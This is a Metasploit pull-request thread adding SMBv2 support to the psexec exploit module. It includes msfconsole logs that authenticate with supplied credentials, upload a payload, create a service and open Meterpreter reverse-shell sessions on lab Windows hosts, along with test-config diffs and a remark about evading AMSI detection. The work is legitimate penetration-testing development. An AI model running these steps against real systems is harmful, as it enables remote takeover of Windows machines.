psexec smb2 support

[jrobles-r7]

Description

This PR updates the module exploit/windows/smb/psexec to support SMBv2 connection with RubySMB.
SMB1 tests:

• Windows 7
• Windows 10

SMB2 tests:

• cpe:/o:microsoft:windows_10:::x64
• cpe:/o:microsoft:windows_8.1::sp1:x64
• cpe:/o:microsoft:windows_server_2008:r2:sp1:x64
• cpe:/o:microsoft:windows_7::sp1:x64
• cpe:/o:microsoft:windows_10:1607::x64
• cpe:/o:microsoft:windows_8.1:::x64
• cpe:/o:microsoft:windows_server_2008::r2:x64

Verification

• Setup a Windows 7 system
• Edit registry HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters
• SMB1 REG_DWORD with Data 0
• SMB2 REG_DWORD with Data 1
• Restart Windows 7
• ./msfconsole
• use exploit/windows/smb/psexec
• set smbuser <user>
• set smbpass <pass>
• set target 1
• set rhost <rhost>
• run
• Get a session
• set target 2
• run
• Get a session

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set target 1 
target => 1
msf5 exploit(windows/smb/psexec) > set smbuser IEUser
smbuser => IEUser
msf5 exploit(windows/smb/psexec) > set smbpass 'Passw0rd!'
smbpass => Passw0rd!
msf5 exploit(windows/smb/psexec) > set rhost 172.22.222.152
rhost => 172.22.222.152
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Executing the payload...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.152:49165) at 2018-06-18 14:07:23 -0500
[-] 172.22.222.152:445 - Exploit failed: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec::Failure
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.152 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Uploading payload...
[*] 172.22.222.152:445 - Created \yownzDcO.exe...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.152:49166) at 2018-06-18 14:08:08 -0500
[-] 172.22.222.152:445 - Exploit failed: RubySMB::Error::CommunicationError RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >

[jrobles-r7]

This should probably be handled in a better way...
It seems like a wait needs to occur for the DCE-RPC call.
If a request is sent early, the Windows host will respond with an error code that makes it seem like everything is broken.

[jmartin-tech]

Jenkins test this please.

[jmartin-tech]

The following will get this PR to run your first testing scenario against Windows 10, since I believe the default target selection would work.

git diff
diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..05b070c8f7 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -41,7 +41,8 @@
             "CPE": "cpe:/o:microsoft:windows_7:::x64"
         },
         {
-            "CPE": "cpe:/o:microsoft:windows_10:::x64"
+            "CPE": "cpe:/o:microsoft:windows_10:::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
         }
     ],
     "TARGET_GLOBALS": {

Or you could make the change to the windows 7 target above if you want the SMBv2 test performed on that OS.

[jrobles-r7]

For Windows 10 the automatic target selection attempts to use powershell, which wasn't working in my testing. How would I change the json file to select the native upload target (set target 2)? The native upload target should work on both Windows 7 and Windows 10.

[jmartin-tech]

For now SETTINGS == OPTIONS

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..01eabfdb43 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -12,7 +12,8 @@
             "NAME": "exploit/windows/smb/psexec",
             "SETTINGS": [
                 "SMBUser=vagrant",
-                "SMBPass=vagrant"
+                "SMBPass=vagrant",
+                "TARGET=2"
             ]
         }
     ],

[jrobles-r7]

I'll try that now 👍

[jmartin-tech]

Jenkins test this please.

[jmartin-tech]

Looks like the success condition for the test has changed.

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..9779e13b80 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -34,7 +34,7 @@
     ],
     "STARTING_LISTENER": 30000,
     "SUCCESS_LIST": [
-        "Session 1 created in the background"
+        "Meterpreter session 1 opened"
     ],
     "TARGETS": [
         {

[busterb]

Woo, it's green! Removing 'delayed'

[GreenEYESSS]

please see it https://github.com/hanshaze/EternalPulse sorry.

[GreenEYESSS]

and it https://github.com/hanshaze/MS17-010-EternalBlue-WinXP-Win10

[busterb]

@GreenEYESSS those comments are totally unrelated to this PR, and the second module you linked to doesn't actually work either.

[busterb]

2003/XP systems seem to return this:

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.104:445 - Connecting to the server...
[*] 192.168.56.104:445 - Authenticating to 192.168.56.104:445 as user 'Administrator'...
[-] 192.168.56.104:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode 0x5b0002
[*] Exploit completed, but no session was created.

[GreenEYESSS]

ok sorry

[jrobles-r7]

Jenkins test this please.

[sempervictus]

Powershell target is likely an AMSI catch. They're actually signing for the bloody architecture resolution part of the cmd invocation which we can drop and force the user to set the right arch for now. Evasions like the metasm C stuff cost space in PSH which pushes us to env-stage (something else they can search for).
Thanks for getting this working - smb1 is getting rare.

[jrobles-r7]

The powershell issue with Windows 10 that I was experiencing was resolved in rex-powershell. I will update the description.

[busterb]

Manual test for Windows 2000:

msf5 exploit(windows/smb/psexec) > set Interrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'Administrator'...
[!] 192.168.56.102:445 - No active DB -- Credential data will not be saved!
[*] 192.168.56.102:445 - Uploading payload... qfQlrYxv.exe
[*] 192.168.56.102:445 - Created \qfQlrYxv.exe...
[*] 192.168.56.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Obtaining a service manager handle...
[*] 192.168.56.102:445 - Creating the service...
[+] 192.168.56.102:445 - Successfully created the service
[*] 192.168.56.102:445 - Starting the service...
[+] 192.168.56.102:445 - Service started successfully...
[*] 192.168.56.102:445 - Removing the service...
[+] 192.168.56.102:445 - Successfully removed the service
[*] 192.168.56.102:445 - Closing service handle...
[*] 192.168.56.102:445 - Deleting \qfQlrYxv.exe...
[*] Sending stage (179779 bytes) to 192.168.56.102

meterpreter >

[busterb]

Release Notes

This adds SMBv1 and SMBv2 support for the exploit/windows/smb/psexec module, enabling compatibility with modern Windows environments (well, until SMB Signing is on by default :).

[11ash]

guy's help in this guest machine is vulnerable .

[] Started reverse TCP handler on 192.168.43.119:4444
[] 192.168.43.50:445 - Connecting to the server...
[] 192.168.43.50:445 - Authenticating to 192.168.43.50:445 as user 'pass'...
[-] 192.168.43.50:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED
[] Exploit completed, but no session was created.